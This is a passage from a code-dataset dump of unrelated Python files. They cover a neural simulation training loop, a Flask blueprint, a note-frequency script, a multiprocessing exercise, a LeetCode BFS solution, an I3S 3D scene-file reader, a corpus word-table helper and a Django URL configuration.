###\n\t\tdecisionPos=np.array([np.unravel_index(decision, params['FEF_shape'])[1],np.unravel_index(decision, params['FEF_shape'])[0]])\n\t\t### which line is the nearest to decisionPos --> decisionOrientation ###\n\t\tdist=np.zeros(len(Input_lineCoords[I]))\n\t\tfor lineIdx in range(len(Input_lineCoords[I])):\n\t\t\tlinePos=np.array(Input_lineCoords[I][lineIdx])\t\t\t\n\t\t\tdist[lineIdx]=np.sqrt(np.sum((linePos-decisionPos)**2))\n\t\tdecisionOrientation=Input_phi[I][dist.argmin()]\n\t\tdistList.append(dist)\t\n\n\t\t### deactivate stimuli + reward after dopDelay ###\n\t\tselection[trial,1]=ann.get_time()\n\t\tV1.B = 0\n\t\tann.simulate(dopDelay)\n\t\tif stimulus==trainStim:\n\t\t\tif decisionOrientation == targetOrientation:\n\t\t\t\tPPTN.B=1\n\t\t\t\tann.simulate(1)\n\t\t\t\tSNc.alpha=1\n\t\t\t\tann.simulate(60)\n\t\t\t\tSNc.alpha=0\n\t\t\t\tPPTN.B=0\n\t\t\t\tnumCorrect+=1\n\t\t\telse:\n\t\t\t\tPPTN.B=0\n\t\t\t\tann.simulate(1)\n\t\t\t\tSNc.alpha=1\n\t\t\t\tann.simulate(60)\n\t\t\t\tSNc.alpha=0\n\t\t\t\tPPTN.B=0\n\t\t\t\tnumCorrect=0\n\n\t\t### intertrial ###\n\t\tann.simulate(intertrial)\n\n\t\t### save ###\n\t\tselection[trial,2]=targetOrientation\n\t\tselection[trial,3]=decisionOrientation\n\t\tselection[trial,4]=decisionOrientation==targetOrientation\n\t\tif stimulus==trainStim:\n\t\t\tselection[trial,5]=1\n\t\telse:\n\t\t\tselection[trial,5]=2\n\t\twith open('data/'+folder+'output'+str(simID)+'.txt', 'a') as f:\n\t\t\tprint(selection[trial,6],trial,selection[trial,1]-selection[trial,0],targetOrientation,decisionOrientation, file=f)\n\t\tif monitorWeights==0:\n\t\t\tw_ITStrD1[trial]=np.array(ITStrD1.w)\n\t\t\tw_ITStrD2[trial]=np.array(ITStrD2.w)\n\t\t\tw_ITSTN[trial]=np.array(ITSTN.w)\n\t\t\tw_StrD1SNr[trial]=np.array(StrD1SNr.w)\n\t\t\tw_StrD2GPe[trial]=np.array(StrD2GPe.w)\n\t\t\tw_STNSNr[trial]=np.array(STNSNr.w)\n\t\t\tw_ITPFC[trial]=np.array(ITPFC.w)\n\t\t\tw_VAPFC[trial]=np.array(VAPFC.w)\n\t\t\tw_StrD1SNc[trial]=np.array(StrD1SNc.w)\n\t\ttrial+=1\n\n\n\t#####################################################\n\t################ GET MONITORS ####################\n\t#####################################################\n\t#rV1=M[0].get('r')\n\t#rV4L4=M[1].get('r')\n\t#rV4L23=M[2].get('r')\n\t#rIT=M[3].get('r')\n\trPFC=M[4].get('mp')\n\t#rFEFv=M[5].get('r')\n\t#rFEFm=M[6].get('r')\n\t#rSTRD1=M[7].get('mp')\n\t#rSTRD2=M[8].get('mp')\n\t#rPPTN=M[9].get('mp')\n\t#rSTN=M[10].get('mp')\n\t#rGPe=M[11].get('mp')\n\t#rSNr=M[12].get('mp')\n\t#rMD=M[13].get('mp')\n\t#rStrThal=M[14].get('mp')\n\t#rSNc=M[15].get('r')\n\t#rFEFvm=M[16].get('r')\n\t#rAuxE=M[17].get('r')\n\t#FEFvQ=M[18].get('q')\n\t\n\t#sumInh=MSNc[0].get('test')\n\t#aux=MSNc[1].get('aux')\n\t#mp=MSNc[2].get('mp')\n\n\tif monitorWeights==1:\n\t\tw_ITStrD1=mon_w_ITStrD1.get('w')\n\t\tw_ITStrD2=mon_w_ITStrD2.get('w')\n\t\tw_ITSTN=mon_w_ITSTN.get('w')\n\t\tw_StrD1SNr=mon_w_StrD1SNr.get('w')\n\t\tw_StrD2GPe=mon_w_StrD2GPe.get('w')\n\t\tw_STNSNr=mon_w_STNSNr.get('w')\n\t\tw_ITPFC=mon_w_ITPFC.get('w')\n\t\tw_VAPFC=mon_w_VAPFC.get('w')\n\t\tw_StrD1SNc=mon_w_StrD1SNc.get('w')\n\n\t\n\t#####################################################\n\t##################### SAVE #######################\n\t#####################################################\n\t#np.save('data/'+folder+'rV1'+str(simID)+'.npy',rV1)\n\t#np.save('data/'+folder+'rV4L4'+str(simID)+'.npy',rV4L4)\n\t#np.save('data/'+folder+'rV4L23'+str(simID)+'.npy',rV4L23)\n\t#np.save('data/'+folder+'rFEFv'+str(simID)+'.npy',rFEFv)\n\t#np.save('data/'+folder+'FEFvQ'+str(simID)+'.npy',FEFvQ)\n\t#np.save('data/'+folder+'FEFvsumExc'+str(simID)+'.npy',FEFvsumExc)\n\t#np.save('data/'+folder+'rFEFm'+str(simID)+'.npy',rFEFm)\n\t#np.save('data/'+folder+'rFEFvm'+str(simID)+'.npy',rFEFvm)\n\t#np.save('data/'+folder+'rAuxE'+str(simID)+'.npy',rAuxE)\n\n\t#np.save('data/'+folder+'rSTRD1'+str(simID)+'.npy',rSTRD1)\n\t#np.save('data/'+folder+'rSTRD2'+str(simID)+'.npy',rSTRD2)\n\t#np.save('data/'+folder+'rSTN'+str(simID)+'.npy',rSTN)\n\t#np.save('data/'+folder+'rIT'+str(simID)+'.npy',rIT)\n\tnp.save('data/'+folder+'rPFC'+str(simID)+'.npy',rPFC)\n\t#np.save('data/'+folder+'rSNr'+str(simID)+'.npy',rSNr)\n\t#np.save('data/'+folder+'rStrThal'+str(simID)+'.npy',rStrThal)\n\t#np.save('data/'+folder+'rGPe'+str(simID)+'.npy',rGPe)\n\t#np.save('data/'+folder+'rMD'+str(simID)+'.npy',rMD)\n\n\t#np.save('data/'+folder+'sumInh'+str(simID)+'.npy',sumInh)\n\t#np.save('data/'+folder+'aux'+str(simID)+'.npy',aux)\n\t#np.save('data/'+folder+'mp'+str(simID)+'.npy',mp)\n\t#np.save('data/'+folder+'rSNc'+str(simID)+'.npy',rSNc)\n\tnp.save('data/'+folder+'selection'+str(simID)+'.npy',selection)\n\n\t#np.save('data/'+folder+'w_ITStrD1'+str(simID)+'.npy',w_ITStrD1)\n\t#np.save('data/'+folder+'w_ITStrD2'+str(simID)+'.npy',w_ITStrD2)\n\t#np.save('data/'+folder+'w_ITSTN'+str(simID)+'.npy',w_ITSTN)\n\t#np.save('data/'+folder+'w_StrD1SNr'+str(simID)+'.npy',w_StrD1SNr)\n\t#np.save('data/'+folder+'w_StrD2GPe'+str(simID)+'.npy',w_StrD2GPe)\n\t#np.save('data/'+folder+'w_STNSNr'+str(simID)+'.npy',w_STNSNr)\n\t#np.save('data/'+folder+'w_ITPFC'+str(simID)+'.npy',w_ITPFC)\n\t#np.save('data/'+folder+'w_VAPFC'+str(simID)+'.npy',w_VAPFC)\n\t#np.save('data/'+folder+'w_StrD1SNc'+str(simID)+'.npy',w_StrD1SNc)\n\n\t#np.save('data/'+folder+'distList'+str(simID)+'.npy',distList)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"run_cla_Training.py","file_name":"run_cla_Training.py","file_ext":"py","file_size_in_byte":13486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"230327112","text":"'''\nAutor: Marcos\nversao: 1.0\ndata: 30-05-2018\n'''\nfrom flask import Flask, Blueprint, render_template, session, request, url_for, redirect, escape\nimport config, modelo, VisaoHTML, querys, querys_antiga, time, sys, json, string, shutil, re\nimport Template_Pagina, pymssql, pymysql, requests\nfrom datetime import datetime\nfrom openpyxl import Workbook\n\n# Registrando o blueprint\nmanuais = Blueprint('manuais', __name__, template_folder = 'templates');\n\n@manuais.route('/manual_api_site')\ndef manual_api_site():\n\tusuario = modelo.Usuario()\n\t# Se Id é igual á zero, sei que o usuario nao tem acesso a pagina\n\tif usuario.getID() == 0:\n\t\treturn redirect('/')\n\n\tmenu = VisaoHTML.getMenuSite(usuario.getMenuAdm())\n\n\treturn render_template('manual_api_site.html', titulo = 'MANUAL DA API DO SITE',\n\tmenu = menu, nome = usuario.getNome())\n\n@manuais.route('/manual_visao_html')\ndef manual_visao_html():\n\tusuario = modelo.Usuario()\n\t# Se Id é igual á zero, sei que o usuario nao tem acesso a pagina\n\tif usuario.getID() == 0:\n\t\treturn redirect('/')\n\n\tmenu = VisaoHTML.getMenuSite(usuario.getMenuAdm())\n\n\treturn render_template('visao_html.html', titulo = 'API visao_html', versao_visao_html = config.versao_visao_html,\n\tmenu = menu, nome = usuario.getNome())\n","sub_path":"manuais.py","file_name":"manuais.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"256747034","text":"# This program returns the frequency of a note entered by the user. the notes\n# are inputtd in the form e.g. \"C4\", where the letter is the note and the number\n# is the octave\n\n# Generating start list of octave 4 notes and thier corresponding frequencies\nNOTES = [\"C4\", \"D4\", \"E4\", \"F4\", \"G4\", \"A4\", \"B4\"]\nFREQ = [261.63, 293.66, 329.63, 349.23, 392.00, 440.00, 493.88]\n\n# Prompting input from user to enter note and octave\nnote = input(\"Please input the note and octave (e.g. C4) you would like to know the frequency for in Hz: \")\n\n# Separating the letter and octave of the inputted note\nletter = note[0]\noctave = note[1]\n\n# Case for exact match in note and NOTES list element\nif note in NOTES:\n print(\"%s is %.2f Hz\" % (note, FREQ[NOTES.index(note)]))\n# If not exact match, looping through the NOTES list, looking for when the firt\n# character of an element matches the letter (first character) of the inputted note.\nelif note not in NOTES:\n for element in NOTES:\n if element[0] == letter:\n # Aquiring the corresponding frequency (basefreq) from FREQ list, as a\n # value to calculate the new frequency with\n basefreq = FREQ[NOTES.index(element)]\n # Using formula to calculate the new frequency (newfreq) freq/ 2**4-x\n # where x is the octave number\n newfreq = basefreq / 2**(4-float(octave))\n # Displaying the inputted note and the calculated new frequency\n print(\"%s is %.2f Hz\" % (note, newfreq))\n","sub_path":"2 if statement exercises/Ex_41.py","file_name":"Ex_41.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"111808513","text":"import multiprocessing as mp\nimport time \nimport sys\n\nto_replace = 'az'\nreplace_with = '{[]}'\n\n\ndef process_txt(start_time, inp_text, i, lock):\n txt = list(inp_text)\n for k, letter in enumerate(txt):\n if letter in to_replace:\n txt[k] = replace_with\n txt = ''.join(txt)\n lock.acquire()\n filename = 'file_' + str(i+1) + '.txt'\n with open(filename, 'w') as f:\n f.write(txt + '\\n')\n f.write(f'Ran for {round(time.time() - start_time, 4)} second(S)... \\n')\n f.close()\n lock.release()\n\ndef main():\n start = time.perf_counter()\n txtsmpl = open('C:\\\\dev\\\\OS\\\\lab2\\\\dummy.txt', 'r').read()\n lock = mp.Lock()\n if len(sys.argv) > 1 and sys.argv[1].isdigit():\n processes_num = int(sys.argv[1]) \n else:\n processes_num = 5\n processes = []\n for i in range(processes_num):\n p = mp.Process(target=process_txt, args = [time.time(), txtsmpl, i, lock])\n p.start()\n processes.append(p)\n\n for process in processes:\n process.join()\n\n finish = time.perf_counter()\n print(f'Finished in {round(finish-start, 4)} second(s)')\n\nif __name__ == \"__main__\":\n main()","sub_path":"OS/lab2/lab2_processes.py","file_name":"lab2_processes.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"42238925","text":"\"\"\"\n286. Walls and Gates\n\nYou are given a m x n 2D grid initialized with these three possible values.\n\n-1 - A wall or an obstacle.\n0 - A gate.\nINF - Infinity means an empty room. We use the value 2^31 - 1 = 2147483647 to represent INF as you may assume that the distance to a gate is less than 2147483647.\nFill each empty room with the distance to its nearest gate. If it is impossible to reach a gate, it should be filled with INF.\n\nExample:\n\nGiven the 2D grid:\n\nINF -1 0 INF\nINF INF INF -1\nINF -1 INF -1\n 0 -1 INF INF\nAfter running your function, the 2D grid should be:\n\n 3 -1 0 1\n 2 2 1 -1\n 1 -1 2 -1\n 0 -1 3 4\n\n\n\"\"\"\n\n\nclass WallsAndGates:\n\n\n \"\"\"\n Approach #2 (Breadth-first Search) [Accepted]\n Instead of searching from an empty room to the gates, how about searching the other way round? In other words,\n we initiate breadth-first search (BFS) from all gates at the same time. Since BFS guarantees that we search\n all rooms of distance d before searching rooms of distance d + 1, the distance to an empty room must be the shortest.\n\n Complexity analysis\n\n Time complexity : O(mn)O(mn).\n\n If you are having difficulty to derive the time complexity, start simple.\n\n Let us start with the case with only one gate. The breadth-first search takes at most m \\times nm×n steps to reach all rooms,\n therefore the time complexity is O(mn)O(mn). But what if you are doing breadth-first search from kk gates?\n\n Once we set a room's distance, we are basically marking it as visited, which means each room is visited at most once.\n Therefore, the time complexity does not depend on the number of gates and is O(mn)O(mn).\n\n Space complexity : O(mn)O(mn). The space complexity depends on the queue's size. We insert at most m \\times nm×n points into the queue.\n \"\"\"\n\n def doit_(self, rooms: list) -> None:\n\n from collections import deque\n if not rooms:\n return\n\n m, n = len(rooms), len(rooms[0])\n zeros = []\n for i in range(m):\n for j in range(n):\n if rooms[i][j] == 0:\n zeros.append((i, j))\n\n queue = deque(zeros)\n inf = 2**31 - 1\n\n while queue:\n\n size = len(queue)\n for _ in range(size):\n\n r, l = queue.popleft()\n levels = rooms[r][l]\n for offset in ((-1, 0), (1, 0), (0, 1), (0, -1)):\n x, y = r + offset[0], l + offset[1]\n if 0 <= x < m and 0 <= y < n and rooms[x][y] == inf:\n rooms[x][y] = levels + 1\n queue.appendleft((x, y))\n\n\nif __name__ == '__main__':\n\n WallsAndGates().doit_([[2147483647,-1,0,2147483647],[2147483647,2147483647,2147483647,-1],[2147483647,-1,2147483647,-1],[0,-1,2147483647,2147483647]])\n\n\n\n","sub_path":"PythonLeetcode/leetcodeM/286_WallsAndGates.py","file_name":"286_WallsAndGates.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"545211968","text":"\r\n# -*- coding: UTF-8 -*-\r\n##################\r\n#author xp 20180802 修订:xupf 完善一些api内容\r\n#I3S API version 1.6\r\n#产品技术部\r\n##############################################\r\nimport json\r\nimport gzip\r\nimport os\r\nimport zipfile\r\nimport struct\r\nimport numpy as np\r\n# from numba import jit,float64,void\r\n# from numba.errors import NumbaDeprecationWarning, NumbaPendingDeprecationWarning\r\n# import warnings\r\n# warnings.simplefilter('ignore', category=NumbaDeprecationWarning)\r\n# warnings.simplefilter('ignore', category=NumbaPendingDeprecationWarning)\r\n# i3s类\r\n# I3S 文件路径\r\n# create by xp dt:20180802 \r\nclass I3S():\r\n def __init__(self,I3SFilePath):\r\n self.i3SPath=I3SFilePath\r\n # LayerInfo 图层信息\r\n layerInfoPath=os.path.join(self.i3SPath,'3dSceneLayer.json.gz')\r\n self.sceneLayerInfo=SceneLayerInfo(layerInfoPath)\r\n\r\n # nodesPath=os.path.join(self.i3SPath,'nodes')\r\n # self.nodes=I3SNode(nodesPath)\r\n # 根节点\r\n rootNodePath=os.path.join(self.i3SPath,r'nodes\\root\\3dNodeIndexDocument.json.gz')\r\n self.i3SRootNode=I3SRootNode(rootNodePath)\r\n\r\n # 元数据\r\n # metadataPath=os.path.join(self.i3SPath,'metadata.json')\r\n # self.metadata=Metadata(metadataPath)\r\n\r\n # 获得所有节点数据\r\n def GetI3SNotes(self):\r\n nodesPath=os.path.join(self.i3SPath,'nodes')\r\n i3SNotes=[]\r\n for root,dirs,files in os.walk(nodesPath):\r\n for item in dirs:\r\n if item!='root':\r\n i3SNotes.append(I3SNode(os.path.join(nodesPath,item,'3dNodeIndexDocument.json.gz')))\r\n break\r\n return i3SNotes\r\n \r\n\r\n \r\n # 根据ID查找Node\r\n # ID号\r\n # 返回值:note\r\n def FindNodebyID(self,id):\r\n nodePath=os.path.join(self.i3SPath,id)\r\n node=I3SNode(nodePath)\r\n return node\r\n\r\n# i3s元数据类\r\n# FilePath:I3S元数据文件路径\r\n# create by xp dt:20180802 \r\nclass Metadata():\r\n def __init__(self,FilePath):\r\n self.filePath=FilePath\r\n metadatafile = open(self.filePath,'r',encoding='utf-8')\r\n file_content=metadatafile.read()\r\n self.metadataJson=json.loads(file_content)\r\n metadatafile.close()\r\n\r\n# SceneLayerInfo基本信息\r\n# 主要用来查询SceneLayer相关信息\r\n# FilePath:SceneLayerInfo文件路径\r\n# crateby xp dt:20180801\r\nclass SceneLayerInfo():\r\n # 初始化SceneLayerInfo\r\n # InputSceneLayerInfoFile:3dSceneLayer.json.gz 压缩包地址\r\n def __init__(self,FilePath):\r\n self.filePath=FilePath\r\n sceneLayerFile=gzip.open(self.filePath,'rb')\r\n file_content=sceneLayerFile.read()\r\n self.sceneLayerJson=json.loads(file_content)\r\n sceneLayerFile.close()\r\n \r\n # 获得空间参考\r\n def GetSpatialReference(self):\r\n return self.sceneLayerJson['spatialReference']\r\n # 获得空间参考\r\n def GetsceneLayerJson(self):\r\n return self.sceneLayerJson\r\n # 设置空间参考\r\n # NewSR:目标空间参考\r\n def SetSpatialReference(self, NewSR):\r\n self.sceneLayerJson['spatialReference']=NewSR\r\n \r\n # 获得空间范围\r\n def GetLayerExtent(self):\r\n return self.sceneLayerJson['store']['extent']\r\n\t#add xupf 调整空间索引链接\r\n def CRSindexChange(self,newwikd):\r\n self.sceneLayerJson['store']['indexCRS']=\"http://www.opengis.net/def/crs/EPSG/0/\"+str(newwikd)\r\n self.sceneLayerJson['store']['vertexCRS']=\"http://www.opengis.net/def/crs/EPSG/0/\"+str(newwikd)\r\n #add xupf 调整发现参考框架\r\n def normalReferenceFrame(self):\r\n self.sceneLayerJson['store']['normalReferenceFrame']=\"vertex-reference-frame\"\r\n # 设置空间范围\r\n # NewExtent;目标空间范围\r\n def SetLayerExtent(self, NewExtent):\r\n self.sceneLayerJson['store']['extent']=NewExtent\r\n\r\n # 保存Json到gz压缩包\r\n def SaveJsonToGZ(self):\r\n sceneLayerFile=gzip.open(self.filePath,'wb')\r\n saveJson=json.dumps(self.sceneLayerJson)\r\n sceneLayerFile.write(str.encode(saveJson))\r\n sceneLayerFile.close() \r\n\r\n# I3S根节点\r\n# FilePath:更节点路径\r\n# create by xp dt20180801\r\nclass I3SRootNode():\r\n def __init__(self,FilePath):\r\n self.filePath=FilePath\r\n rootFile=gzip.open(self.filePath,'rb')\r\n file_content=rootFile.read()\r\n self.rootJson=json.loads(file_content)\r\n rootFile.close()\r\n \r\n # 保存json到压缩包\r\n def SaveJsonToGZ(self):\r\n saveJson=json.dumps(self.rootJson)\r\n rootFile=gzip.open(self.filePath,'wb')\r\n rootFile.write(str.encode(saveJson))\r\n rootFile.close()\r\n\r\n# I3S节点\r\n# FilePath:节点路径\r\n# create by xp dt 20180801\r\nclass I3SNode():\r\n def __init__(self,FilePath):\r\n self.filePath=FilePath\r\n nodeFile=gzip.open(self.filePath,'rb')\r\n file_content=nodeFile.read()\r\n self.i3SNodeJson=json.loads(file_content)\r\n nodeFile.close()\r\n\r\n\r\n # 最小内切球\r\n def GetMBS(self):\r\n return self.i3SNodeJson['mbs']\r\n\r\n # 设置最小内切球\r\n # NewMBS:目标内切球\r\n def SetMBS(self,NewMBS):\r\n self.i3SNodeJson['mbs']=NewMBS\r\n\r\n # 最小定向外包矩形\r\n def GetOBB(self):\r\n if 'obb' in self.i3SNodeJson.keys() and self.i3SNodeJson['obb']:\r\n return self.i3SNodeJson['obb']\r\n\r\n # 设置最小外包矩形\r\n # NewOBB:目标外包矩形\r\n def SetOBB(self,NewOBB):\r\n self.i3SNodeJson['obb']=NewOBB\r\n\r\n # 获得父节点\r\n def GetParentNode(self):\r\n return self.i3SNodeJson['parentNode']\r\n\r\n #设置父节点\r\n # NewParentNode:目标父节点\r\n def SetParentNode(self,NewParentNode):\r\n self.i3SNodeJson['parentNode']=NewParentNode\r\n\r\n # 获得子节点\r\n def GetChildrens(self):\r\n childrenNode=[]\r\n if 'children' in self.i3SNodeJson.keys() and self.i3SNodeJson['children']:\r\n if len(self.i3SNodeJson['children'])>0:\r\n rootNodePath=os.path.split(self.filePath)[0]\r\n os.chdir(rootNodePath)\r\n for childnode in self.i3SNodeJson['children']:\r\n fullPath=os.path.abspath(childnode['href'])\r\n nodePath=os.path.join(fullPath,'3dNodeIndexDocument.json.gz')\r\n childrenNode.append(I3SNode(nodePath))\r\n\r\n return childrenNode\r\n\r\n # 设置子节点\r\n # newChildrens:新子节点集合\r\n def SetChildrens(self,newChildrens):\r\n self.i3SNodeJson['children']=newChildrens\r\n\r\n # 保存json到压缩包\r\n def SaveJsonToGZ(self):\r\n saveJson=json.dumps(self.i3SNodeJson)\r\n nodeFile=gzip.open(self.filePath,'wb')\r\n nodeFile.write(str.encode(saveJson))\r\n nodeFile.close()\r\n\r\n # 获得属性attributeData引用地址\r\n def GetAttributes(self):\r\n attributes=[]\r\n if 'attributeData' in self.i3SNodeJson.keys() and self.i3SNodeJson['attributeData']:\r\n for index in len(self.i3SNodeJson['attributeData']):\r\n attributes.append(self.GetAttribute(index))\r\n return attributes\r\n\r\n # 根据索引获得属性 \r\n # index:属性索引\r\n def GetAttribute(self,index=0):\r\n rootNodePath=os.path.split(self.filePath)[0]\r\n os.chdir(rootNodePath)\r\n gzPath=self.i3SNodeJson['attributeData'][index]['href']+'.bin.gz'\r\n gzPath=os.path.abspath(gzPath)\r\n attribute=Attribute(gzPath)\r\n return attribute \r\n\r\n # 获得Features引用地址\r\n def GetFeatures(self):\r\n features=[]\r\n if 'featureData' in self.i3SNodeJson.keys() and self.i3SNodeJson['featureData']:\r\n for index in range(len(self.i3SNodeJson['featureData'])):\r\n features.append(self.GetFeature(index))\r\n return features\r\n return features\r\n\r\n # 根据索引获得Feature\r\n # index:feature 索引\r\n def GetFeature(self,index=0):\r\n rootNodePath=os.path.split(self.filePath)[0]\r\n os.chdir(rootNodePath)\r\n gzPath=self.i3SNodeJson['featureData'][index]['href']+'.json.gz'\r\n gzPath=os.path.abspath(gzPath)\r\n feature=Features(gzPath)\r\n return feature\r\n\r\n # 获得Geometry\r\n def GetGeometries(self):\r\n geometries=[]\r\n if 'geometryData' in self.i3SNodeJson.keys() and self.i3SNodeJson['geometryData']:\r\n for index in range(len(self.i3SNodeJson['geometryData'])):\r\n geometries.append(self.GetGeometry(index))\r\n return geometries\r\n return geometries\r\n\r\n # 根据索引获得Geometry\r\n # index:索引\r\n def GetGeometry(self,index=0):\r\n rootNodePath=os.path.split(self.filePath)[0]\r\n os.chdir(rootNodePath)\r\n binPath=self.i3SNodeJson['geometryData'][index]['href']+'.bin.gz'\r\n binPath=os.path.abspath(binPath)\r\n rule=self.GetFeature(index).GeometryRule()\r\n geometry=Geometry(binPath,rule)\r\n return geometry\r\n\r\n #获得材质\r\n def GetShared(self):\r\n rootNodePath=os.path.split(self.filePath)[0]\r\n os.chdir(rootNodePath)\r\n filePath=self.i3SNodeJson['sharedResource']['href']+'\\\\sharedResource.json.gz'\r\n filePath=os.path.abspath(filePath)\r\n shared=Shared(filePath)\r\n return shared\r\n\r\n # 获得贴图\r\n #这里可能会出现小问题 xupf\r\n def GetTextures(self):\r\n textures=[]\r\n if 'textureData' in self.i3SNodeJson.keys() and self.i3SNodeJson['textureData']:\r\n for index in len(self.i3SNodeJson['textureData']):\r\n textures.append(index)\r\n return textures\r\n return textures\r\n\r\n # 根据索引获得贴图\r\n # index: 索引\r\n def GetTexture(self,index=0):\r\n if 'textureData' in self.i3SNodeJson.keys() and self.i3SNodeJson['textureData']:\r\n rootNodePath=os.path.split(self.filePath)[0]\r\n os.chdir(rootNodePath)\r\n binPath=self.i3SNodeJson['textureData'][index]['href']+'.bin'\r\n binPath=os.path.abspath(binPath)\r\n texture=Texture(binPath)\r\n return texture\r\n \r\n# Attribute类\r\n# Attribute文件路径\r\n# create by xp dt:20180802 \r\nclass Attribute():\r\n def __init__(self,FilePath):\r\n self.filePath=FilePath\r\n attributeFile=gzip.open(self.filePath,'rb')\r\n self.attributeFileBin=attributeFile.read()\r\n attributeFile.close()\r\n\r\n # 保存属性到gz压缩包\r\n def SaveBinToGZ(self):\r\n with gzip.open(self.filePath,'wb') as wf:\r\n wf.write(self.attributeFileBin)\r\n wf.close()\r\n\r\n# Texture类\r\n# Texture文件路径\r\n# create by xp dt:20180802 \r\nclass Texture():\r\n def __init__(self,FilePath):\r\n \r\n self.filePath=FilePath\r\n # self.rules=Rules\r\n textureFile=gzip.open(self.filePath,'rb')\r\n self.textureBin=textureFile.read()\r\n textureFile.close()\r\n\r\n # 保存贴图到二进制文件\r\n def SaveBinToGZ(self):\r\n with gzip.open(self.filePath,'wb') as wf:\r\n wf.write(self.textureBin)\r\n wf.close()\r\n\r\n\r\n# FeatureData类\r\n# 待完善\r\n# create by xp dt:20180802 \r\nclass FeatureData():\r\n def __init__(self):\r\n self.id=-1\r\n self.position=[]\r\n self.pivotOffset=[]\r\n self.mbb=[]\r\n self.layer=''\r\n self.geometries=None\r\n\r\n# Features类\r\n# Features文件路径\r\n# create by xp dt:20180802 \r\nclass Features():\r\n def __init__(self,FilePath):\r\n self.filePath=FilePath\r\n featureFile=gzip.open(self.filePath,'r')\r\n file_content=featureFile.read()\r\n self.featureJson=json.loads(file_content)\r\n featureFile.close()\r\n\r\n # 获得所有ID 这个id表示的是返回列表元素的下标\r\n def featureDataArray(self):\r\n return self.featureJson['featureData']\r\n \r\n # 根据索引获得ID\r\n # index:索引\r\n def GetID(self, index=0):\r\n return self.featureJson['featureData'][index]['id']\r\n\r\n # 根据索引获得位置\r\n # index:索引\r\n def GetPosition(self,index=0):\r\n return self.featureJson['featureData'][index]['position']\r\n\r\n # 根据索引更新位置\r\n # index:索引\r\n def SetPosition(self,NewPosition,index=0):\r\n self.featureJson['featureData'][index]['position']=NewPosition\r\n \r\n #根据索引获得最小边界包围盒\r\n # index:索引\r\n def GetMbb(self,index=0):\r\n return self.featureJson['featureData'][index]['mbb']\r\n\r\n def SetMbb(self,NewMbb,index=0):\r\n self.featureJson['featureData'][index]['mbb']=NewMbb\r\n\r\n # 根据索引获得GeometryData\r\n # index:索引\r\n def GeometryData(self):\r\n return self.featureJson['geometryData']\r\n\r\n # 根据索引获得GeometryTransformation\r\n # index:索引\r\n def GetGeometryTransformation(self,index=0):\r\n return self.featureJson['geometryData'][index]['transformation']\r\n\r\n # 根据索引更新GeometryTransformation\r\n # index:索引\r\n def SetGeometryTransformation(self,NewTransformation, index=0):\r\n self.featureJson['geometryData'][index]['transformation']=NewTransformation\r\n\r\n # 根据索引获得GeometryRule\r\n # index:索引\r\n def GeometryRule(self,index=0):\r\n return self.featureJson['geometryData'][index]['params']['vertexAttributes']\r\n # 根据索引获得GeometryRule1\r\n # index:索引\r\n #by xupf 进行节点几何删除抽稀操作\r\n def GeometryRule1(self,index=0):\r\n return self.featureJson['geometryData'][index]['params']['featureAttributes']\r\n # 保存到gz压缩包\r\n def SaveJsonToGZ(self):\r\n saveJson=json.dumps(self.featureJson)\r\n featureFile=gzip.open(self.filePath,'w')\r\n featureFile.write(str.encode(saveJson))\r\n featureFile.close()\r\n\r\n# Geometry类\r\n# FilePath:Geometry文件路径\r\n# Rules:解析规则\r\n# create by xp dt:20180802 \r\nclass Geometry():\r\n def __init__(self,FilePath,Rules):\r\n self.filePath=FilePath\r\n self.rules=Rules\r\n geometryFile=gzip.open(self.filePath,'rb')\r\n self.geometryBin=geometryFile.read()\r\n geometryFile.close()\r\n\r\n \r\n # # 初始化位置,法线,UV,颜色\r\n # def Init(self, parameter_list):\r\n # self.positionCollection=self.GetPositions()\r\n # self.normalCollection=self.GetPosition()\r\n # self.uv0Collection=self.GetPosition()\r\n # self.colorCollection=self.GetPosition()\r\n\r\n # 获得所有的顶点位置\r\n def GetPositions(self):\r\n count=self.rules['position']['count']\r\n i=0\r\n positionCollection=[]\r\n while (i')\n self.add_word('')\n\n def load(self, path1, path2):\n with open(path1, 'rb') as f:\n self.word2id = pickle.load(f)\n with open(path2, 'rb') as f:\n self.id2word = pickle.load(f)\n \n def add_word(self, word):\n if not word in self.word2id: #如果词到索引的映射字典中 不包含该词 则添加\n self.word2id[word] = self.id\n self.id2word[self.id] = word \n self.id += 1\n\n\nclass Corpus(object):\n def __init__(self, datapath):\n self.wordTable = WordTable() \n self.path = datapath\n with open(self.path, 'r') as f:\n self.data = f.readlines()\n \n def get_data(self):\n \n tokens = 0\n for line in self.data: \n words = line.split() + [''] \n tokens += len(words)\n for word in words:\n self.wordTable.add_word(word) \n \n def get_vector(self, id, seqlen=10):\n words = self.data[id].split()\n x = []\n y = []\n for word in words:\n x.append(self.wordTable.word2id[word])\n \n y = x.copy()\n y.pop(0)\n y.append(self.wordTable.word2id[''])\n \n tmp = [0 for i in range(seqlen)]\n x += tmp\n y += tmp\n x = x[:seqlen]\n y = y[:seqlen]\n\n return np.array(x), np.array(y)\n\n def get_words(self, vec):\n ret = []\n for idx in vec:\n if idx in self.wordTable.id2word:\n ret.append(self.wordTable.id2word[idx])\n else:\n ret.append('')\n return ret\n\n \n ","sub_path":"task4/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"549895302","text":"from django.urls import re_path, path\n\nfrom . import views\n\napp_name = \"posts\"\n\nurlpatterns = [\n path('', views.AllPosts.as_view(), name=\"all\"),\n path('new/', views.CreatePost.as_view(), name=\"create\"),\n re_path(\n r\"by/(?P[-\\w]+)/$\",\n views.UserPosts.as_view(),\n name=\"for_user\"\n ),\n re_path(\n r\"by/(?P[-\\w]+)/(?P\\d+)/$\",\n views.SinglePost.as_view(),\n name=\"single\"\n ),\n re_path(\n r\"delete/(?P\\d+)/$\",\n 